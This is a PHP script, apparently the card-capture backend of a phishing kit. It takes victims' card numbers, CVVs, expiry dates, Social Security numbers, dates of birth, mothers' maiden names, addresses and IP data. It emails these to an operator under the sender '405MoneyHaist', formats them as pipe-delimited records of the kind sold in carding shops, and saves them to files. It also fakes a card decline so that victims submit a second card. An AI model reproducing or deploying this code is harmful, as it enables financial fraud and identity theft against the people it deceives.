<?php
session_start();
ob_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);
include '../function/fungsi.php';
$res = json_decode(file_get_contents('../../config/access.json'), true);

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $errors = [];
    
    function validate($field, $message) {
        global $errors;
        if (empty($_POST[$field])) {
            $errors[$field] = $message;
        }
    }

    validate("cardName", "");
    validate("cardNumber", "");
    validate("Month", "");
    validate("Year", "");
    validate("CVV", "");
    
    if (!empty($_SESSION['old_card'])) {
        if($_SESSION['old_card'] === $_POST['cardNumber'])
        {
            header("Location: ../billing?execution=".generateRandomString(100));
            exit;
        }
    }

    if (!empty($errors)) {
        $_SESSION['errors'] = $errors;
        $_SESSION['old'] = $_POST;
        header("Location: ../billing?execution=".generateRandomString(100));
        exit;
    }
    
    $formData = $_SESSION['form_data'] ?? [];
    $ip = $_SERVER['REMOTE_ADDR'];
    $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
    
    $cardname = $_POST['cardName'];
    $cardNumber = str_replace(' ', '', $_POST['cardNumber']);

    if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
        header("HTTP/1.1 400 Bad Request");
        exit;
    }

    $expMon = $_POST['Month'];
    $expYer = $_POST['Year'];
    $expirationDate = "$expMon / $expYer";
    $cvv = $_POST['CVV'];
    $cid = $_POST['CID'];
    $xid = $_POST['xid'];

    $bin = substr($cardNumber, 0, 6);
    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);
    
    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'N/A';
    $region = $ispInfo['region'] ?? 'N/A';
    $country = $ispInfo['country'] ?? 'N/A';
    $isp = $ispInfo['isp'] ?? 'N/A';
    
    if($_SESSION['type_account'] == 'Business')
    {
        $cName = htmlspecialchars($formData['companyName'] ?? '');
        $ein = htmlspecialchars($formData['ein'] ?? '');
    }
    
    $fullname = htmlspecialchars($formData['firstName'] ?? '') .' '. htmlspecialchars($formData['lastName'] ?? '');
    $address = htmlspecialchars($formData['streetAddress'] ?? '');
    $address2 = htmlspecialchars($formData['aptNumber'] ?? '') .' '. htmlspecialchars($formData['address_poBox'] ?? '');
    $city = htmlspecialchars($formData['city'] ?? '');
    $state = htmlspecialchars($formData['state'] ?? '');
    $zipcode = htmlspecialchars($formData['zipCode'] ?? '');
    $phonenumber = htmlspecialchars($formData['phone'] ?? '');
    $cty = htmlspecialchars($formData['address_country'] ?? '');
    $sosel = htmlspecialchars($formData['identitySsn'] ?? '');
    $dob = htmlspecialchars($formData['birthMonth'] ?? '') .'/'. htmlspecialchars($formData['birthDay'] ?? '') .'/'. htmlspecialchars($formData['birthYear'] ?? '');
    $mmn = htmlspecialchars($formData['mmn'] ?? '');
    $email = htmlspecialchars($formData['email'] ?? '');
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    $webshopx = "$cardNumber|$expMon|$expYer|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$email|$ip|$userAgent";
    
    $templateCard = str_replace("##EMAIL##", $email, $templateCard);
    $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
    $templateCard = str_replace("##CNM##", $cardname, $templateCard);
    $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
    $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
    $templateCard = str_replace("##CVV##", $cvv, $templateCard);
    $templateCard = str_replace("##CID##", $cid, $templateCard);
    $templateCard = str_replace("##XID##", $xid, $templateCard);
    $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
    $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
    $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
    $templateCard = str_replace("##CTY##", $city, $templateCard);
    $templateCard = str_replace("##STE##", $state, $templateCard);
    $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
    $templateCard = str_replace("##PINN##", '', $templateCard);
    $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
    $templateCard = str_replace("##MMN##", $mmn, $templateCard);
    $templateCard = str_replace("##DOB##", $dob, $templateCard);
    $templateCard = str_replace("##SSN##", $sosel, $templateCard);
    $templateCard = str_replace("##COPYWEB##", $webshopx, $templateCard);
    $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
    $templateCard = str_replace("##DV##", $device, $templateCard);
    $templateCard = str_replace("##BW##", $browser, $templateCard);
    $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
    $templateCard = str_replace("##ST##", $region, $templateCard);
    $templateCard = str_replace("##CT##", $country, $templateCard);
    $templateCard = str_replace("##IP##", $ip, $templateCard);
    $templateCard = str_replace("##UA##", $userAgent, $templateCard);
    
    $subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
    
    $webshop = "$cardNumber|$expMon|$expYer|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$email|$ip|$userAgent";
    
    // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
    cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
    
    $ipData = fetchIpData($ip, $userAgent);
    $newCount = updateLoginCount();
    
    if ($config['double_card'] == '1') {
        if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
        if (!isset($_SESSION['card_declined'])) {
            $_SESSION['card_declined'] = 1;
            $_SESSION['old_card'] = $_POST['cardNumber'];
            header("Location: ../billing?execution=" . generateRandomString(100));
            ob_end_flush();
            exit;
        }
    } else {
        if ($ipData) saveIpData($ipData, 'Human Submit Card');
    }

    if(isset($_SESSION['card_declined']))
    {
        if ($ipData) saveIpData($ipData, 'Human Submit Card 2');
        unset($_SESSION['card_declined']);
        unset($_SESSION['old_card']);
    }

    webShopSave($webshop);
    
    $_SESSION['success'] = "Form successfully validated!";
    header("Location: ../complete?execution=".generateRandomString(100));
    ob_end_flush();
    exit;
}
ob_end_flush();